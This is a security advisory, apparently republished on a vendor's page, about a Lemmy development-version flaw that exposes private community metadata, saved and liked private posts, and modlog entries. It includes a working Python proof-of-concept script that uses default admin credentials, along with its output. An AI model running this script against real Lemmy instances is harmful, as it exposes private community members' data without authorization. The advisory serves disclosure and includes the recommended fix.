GHSA-95q8-x6r6-672m
MEDIUMLemmy may expose private community data through community, saved, liked, and modlog API views
Blast Radius
lemmy_apiReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects crates.io packages — download data is not available via public APIs for these ecosystems.
Description
NOTE: Only affects development version.
Summary
Lemmy applies private-community checks in PostView and CommentView, but several adjacent API views skip the accepted-follower filter. Bob, a registered user who is not an accepted follower, can read private community sidebar and summary fields. Alice, a former accepted follower, can still read saved and liked private post bodies after she leaves. An unauthenticated visitor can read private community metadata and removed private post names through the modlog.
Details
CommunityView::read() and CommunityQuery::list() call visible_communities_only(), but they do not add the private-community filter used by post and comment reads:
query = my_local_user.visible_communities_only(query);
query.first(conn).await.with_lemmy_type(LemmyErrorType::NotFound)
PersonSavedCombinedQuery::list() and PersonLikedCombinedQuery::list() join community_actions, but they only filter by the requesting person id. They do not require community_actions.follow_state = Accepted when the community has visibility = Private.
The modlog query returns ListingType::All without a visibility predicate:
query = match self.listing_type.unwrap_or(ListingType::All) {
ListingType::All => query,
The control paths show the expected check. PostView::read() and CommentView::read() both filter private communities to accepted followers:
community::visibility
.ne(CommunityVisibility::Private)
.or(community_actions::follow_state.eq(CommunityFollowerState::Accepted))
Proof of Concept
The following script reproduces the leak against a fresh Lemmy instance. Tested against dessalines/lemmy:nightly with the default setup account from the sample config. The script opens registration so it can create Alice and Bob.
import requests, random, string
BASE = "http://127.0.0.1:8536/api/v4" # change to the target Lemmy URL
ADMIN_USER = "lemmy"
ADMIN_PASS = "lemmylemmy"
PASSWORD = "Password123456!"
def req(method, path, token=None, params=None, **body):
headers = {}
if token:
headers["Authorization"] = "Bearer " + token
return requests.request(method, BASE + path, headers=headers, params=params, json=body or None)
def register(name):
r = req("POST", "/account/auth/register", username=name, password=PASSWORD,
password_verify=PASSWORD, email=name + "@example.test")
r.raise_for_status()
token = r.json()["jwt"]
person_id = req("GET", "/account", token).json()["local_user_view"]["person"]["id"]
return token, person_id
def show(label, response, marker):
text = response.text
print("\n" + label + ": HTTP", response.status_code)
print(text[:700])
print("contains marker:", marker in text)
suffix = "poc" + "".join(random.choice(string.ascii_lowercase) for _ in range(6))
admin = req("POST", "/account/auth/login", username_or_email=ADMIN_USER, password=ADMIN_PASS).json()["jwt"]
req("PUT", "/site", admin, registration_mode="open", email_verification_required=False)
alice, alice_id = register("alice" + suffix)
bob, _ = register("bob" + suffix)
secret = "SECRET_" + suffix
community = req("POST", "/community", admin,
name="priv" + suffix,
title="Private Proof " + suffix,
sidebar=secret + " sidebar",
summary=secret + " summary",
visibility="private").json()["community_view"]["community"]
community_id = community["id"]
post = req("POST", "/post", admin, name="secret post " + suffix,
community_id=community_id, body=secret + " post body").json()["post_view"]["post"]
post_id = post["id"]
show("Bob reads private community metadata", req("GET", "/community", bob, params={"id": community_id}), secret)
show("Bob direct post read control", req("GET", "/post", bob, params={"id": post_id}), secret)
req("POST", "/community/follow", alice, community_id=community_id, follow=True)
req("POST", "/community/pending_follows/approve", admin,
community_id=community_id, follower_id=alice_id, approve=True)
req("PUT", "/post/save", alice, post_id=post_id, save=True)
req("POST", "/post/like", alice, post_id=post_id, is_upvote=True)
req("POST", "/community/follow", alice, community_id=community_id, follow=False)
show("Alice direct post read after leaving", req("GET", "/post", alice, params={"id": post_id}), secret)
show("Alice saved list after leaving", req("GET", "/account/saved", alice), secret)
show("Alice liked list after leaving", req("GET", "/account/liked", alice), secret)
mod_comm = req("POST", "/community", admin,
name="modlog" + suffix,
title="Private Modlog " + suffix,
sidebar=secret + " modlog sidebar",
summary=secret + " modlog summary",
visibility="private").json()["community_view"]["community"]
mod_post = req("POST", "/post", admin, name=secret + " removed post",
community_id=mod_comm["id"], body="body").json()["post_view"]["post"]
req("POST", "/post/remove", admin, post_id=mod_post["id"], removed=True, reason="poc")
show("Unauthenticated modlog", req("GET", "/modlog", params={"listing_type": "all", "limit": 50}), secret)
Output:
Bob reads private community metadata: HTTP 200
contains marker: True
Bob direct post read control: HTTP 404
contains marker: False
Alice direct post read after leaving: HTTP 404
contains marker: False
Alice saved list after leaving: HTTP 200
contains marker: True
Alice liked list after leaving: HTTP 200
contains marker: True
Unauthenticated modlog: HTTP 200
contains marker: True
Impact
Bob can read private community descriptions and sidebars before a moderator approves him. Alice can leave a private community, or a moderator can remove her, and Lemmy still returns private post bodies that Alice saved or liked while she was a member. An unauthenticated visitor can use the public modlog to discover private community metadata and removed private post names.
Recommended Fix
Apply the same private-community filter used by PostView and CommentView to CommunityView::read(), CommunityQuery::list(), PersonSavedCombinedQuery::list(), PersonLikedCombinedQuery::list(), and the ListingType::All branch of the modlog query. Admins and accepted followers should keep access. Other callers should receive the same 404 behavior as GET /post and GET /comment.
Found by aisafe.io
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🦀crates.io | lemmy_api | all versions | No fix |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for lemmy_api. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Remediation status
No patched version of lemmy_api has shipped for GHSA-95q8-x6r6-672m yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.
Mitigate without a patch
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-95q8-x6r6-672m is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-95q8-x6r6-672m. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-95q8-x6r6-672m in your dependencies?
O3 detects GHSA-95q8-x6r6-672m across crates.io dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.